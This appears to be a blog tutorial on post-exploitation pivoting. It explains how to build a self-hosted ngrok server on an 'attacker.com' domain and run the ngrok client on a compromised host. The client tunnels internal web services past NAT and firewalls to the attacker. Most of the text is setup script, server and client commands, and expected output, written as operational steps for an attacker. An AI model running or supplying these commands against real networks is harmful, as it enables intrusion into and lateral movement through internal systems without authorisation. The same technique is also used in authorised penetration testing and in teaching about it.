Using ngrok to proxy internal servers in restrictive environments |
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Présentation : When gaining shell access to a machine on a network, a promising attack vector is to check the internal network for web applications and services that may be accessible from the machine that has been compromised. Often, internal web applications are found on the local subnets and could allow for an attacker to explore or exploit these applications in order to gain access to another machine with potentially more access on the network. However, if you're just an attacker that has shell access on a machine that you've compromised, running a proxy on the compromised machine is not always an easy task. In scenarios where you don't have SSH access, can't escalate privileges or can't open ports, one solution comes to mind when wanting to proxy local hosts to your own server. This is where the tool ngrok comes in handy. As the ngrok wiki explains on Github, the tool lets you Expose any http service behind a NAT or firewall to the internet on a subdomain of yourserver.com Expose any tcp service behind a NAT or firewall to the internet on a random port of yourserver.com Inspect all http requests responses that are transmitted over the tunnel Replay any request that was transmitted over the tunnel Ngrok is composed of the server and the client. If you use an ngrok client out of the box, the client will proxy any said local host and port to a random subdomain on ngrok.com - a service that is provided for free with limitations by the maintainers of the ngrok project. Here's a good diagram demonstrating ngrok's functionalities However, Ngrok also provides the option for one to run their own server. This is probably what you want to do in order to ensure that the traffic you're proxying doesn't go through the third party ngrok service. Since ngrok is primarily a Go based tool, the ngrok clients are extremely portable and work on Mac, Windows, Linux ARM and FreeBSD with a single pre-compiled binary. In order to set up your own ngrok server, follow these steps Get a domain and add the following DNS records attacker.com - your_host_ip .attacker.com - your_host_ip Modify the following script to use your domain name in the NGROK_DOMAIN variable and save it as setupngrok.sh NGROK_DOMAIN attacker.com git clone https github.com inconshreveable ngrok.git cd ngrok openssl genrsa -out rootCA.key 2048 openssl req -x509 -new -nodes -key rootCA.key -subj CN NGROK_DOMAIN -days 5000 -out rootCA.pem openssl genrsa -out device.key 2048 openssl req -new -key device.key -subj CN NGROK_DOMAIN -out device.csr openssl x509 -req -in device.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out device.crt -days 5000 cp rootCA.pem assets client tls ngrokroot.crt make clean make release-server release-client original script from https gist.github.com lyoshenka 002b7fbd801d0fd21f2f Run the script via bash setupngrok.sh and then change directories to the ngrok folder cd ngrok. Now, the last part, to run the ngrok server you must run the following command while specifying the ssl .key and .crt generated by the script earlier bin ngrokd -tlsKey device.key -tlsCrt device.crt -domain NGROK_DOMAIN -httpAddr 8000 -httpsAddr 8001 If running the above command returns the following, you should be good to go 11 18 15 00 52 24 INFO metrics Reporting every 30 seconds 11 18 15 00 52 24 INFO registry tun No affinity cache specified 11 18 15 00 52 24 INFO Listening for public http connections on 8000 11 18 15 00 52 24 INFO Listening for public https connections on 8001 11 18 15 00 52 24 INFO Listening for control and proxy connections on 4443 Copy the ngrok client from ngrok bin ngrok to your compromised host and then run the following commands to proxy internal traffic NGROK_DOMAIN attacker.com echo -e server_addr NGROK_DOMAIN 4443 ntrust_host_root_certs false ngrok-config . ngrok -config ngrok-config 80 The final command above will tunnel the local address at port 80, to your ngrok server located on attacker.com. If all goes well, the output of the tool should look like this Tunnel Status online Version 1.3 1.3 Forwarding http 3a4bfceb.attacker.com - 80 Forwarding https 3a4bfceb.attacker.com - 80 Web Interface http 4040 Conn 0 Avg Conn Time 0.00ms You should now be able to visit https 3a4bfceb.attacker.com - which is actually proxying internal traffic via the compromised host to the internal server 80. This technique can be really useful when stuck in internal environments with no easy way to create a proxy for the internal network.
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